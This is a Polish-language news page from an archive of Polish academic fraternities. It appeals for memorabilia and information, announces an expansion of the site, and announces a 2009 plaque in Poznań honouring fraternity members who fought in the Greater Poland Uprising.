Większość z takich pamiątek korporacyjnych to fotografie, choć znajdują się wśród nich także pojedyncze dekle, bandy oraz inne utensylia korporacyjne (vide Identyfikacja fotografii).

Będziemy bardzo wdzięczni za wszelkie informacje, sugestie i przypuszczenia odnośnie prezentowanych w tym dziale pamiątek korporacyjnych (vide Kontakt).

_________________________________________________________________________________________

Rozszerzenie strony Archiwum Korporacyjnego

Strona główna witryny Archiwum Korporacyjnego - Archiwum i Muzeum Polskich Korporacji Akademickich

W najbliższym tygodniach strona internetowa Archiwum Korporacyjnego ulegnie znacznemu rozszerzeniu. Prosimy o wybaczenie, jeśli wystąpiłyby przejściowe niedogodności techniczne:)

W ramach prowadzonych prac dodanych zostanie około 20 podstron, w tym w Muzeum Polskich Korporacji Akademickich opracowania poświęcone 16 dotychczas nie przedstawionym szerzej na stronie korporacjom warszawskim (Arkonia, Welecja, Maltanja) oraz poznańskim (Posnania, Legia, Mercuria, Slensania, Laconia, Hermesia, Aesculapia, Icaria, Gedania Posnaniensis, Odra, Codania, Iustitia, Husaria).

W związku z podjętymi pracami będziemy wdzięczni za pomoc, a w szczególności za wszelkie materiały i informacje dotyczące zarówno wyżej wymienionych korporacji, jak także dotychczas nie przedstawionych na stronie polskich korporacji akademickich (vide “Pozostałe” w Muzeum Korporacyjne). Prosimy także o nadsyłanie biogramów przedwojennych członków korporacji.

Wszystkim osobom, które przyczyniły i przyczynią się do tego rozszerzenia witryny Muzeum Polskich Korporacji Akademickich jesteśmy bardzo zobowiązani!

_________________________________________________________________________________________

W hołdzie korporantom-powstańcom wielkopolskim

Tablica poświęcona korporantom-powstańcom wielkopolskim

Z okazji 90. rocznicy wybuchu Powstania Wielkopolskiego dnia 25 stycznia 2009 r. odsłonięta zostanie tablica pamiątkowa poświęcona korporantom-powstańcom wielkopolskim.

Na tablicy imiennie wymieniono dziesięć wybitnych postaci reprezentujących polski ruch korporacyjny. Są to dwaj dowódcy Powstania gen. Józef Dowbor-Muśnicki (Lechia) oraz gen. Stanisław Taczak (Lechia), a także gen. Władysław Anders (Arkonia), mec. dr Stanisław Celichowski (Filomatia Posnaniensis), sędzia Sądu Najwyższego Kazimierz Daszyński (Magna-Polonia), prof. Wiktor Dega (Icaria), por. rez. Feliks Dropiński (Masovia), ks. gen. Józef Prądzyński (Baltia), płk. dr Bernard Śliwiński (Surma) oraz gen. prof. Ireneusz Wierzejewski (Chrobria).

Tablica znajdzie się w miejscu najściślej związanym z Powstaniem - przy placu Wolności w Poznaniu. Dzięki uprzejmości Kurii Metropolitalnej uzyskano zgodę na jej umieszczenie na elewacji gmachu Księgarni św. Wojciecha. Poświęcenia tablicy dokona w dniu 25 stycznia 2009 r. o godz. 12.30 ks. abp. Stanisław Gądecki. Serdecznie zapraszamy!

Tablica powstanie w ramach, realizowanego z inicjatywy Archiwum Korporacyjnego przez Stowarzyszenie Filistrów Poznańskich Korporacji Akademickich i ze wsparciem Poznańskiego Koła Międzykorporacyjnego, projektu “Nowe tablice korporacyjne - w 25. rocznicę odsłonięcia tablic korporacyjnych w krużgankach klasztoru oo. Dominikanów w Poznaniu” (vide Tablice pamiątkowe). Stroną merytoryczną projektu zajmuje się Archiwum Korporacyjne, a organizacyjno-finansową Fundacja “Polskie Korporacje Akademickie”.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }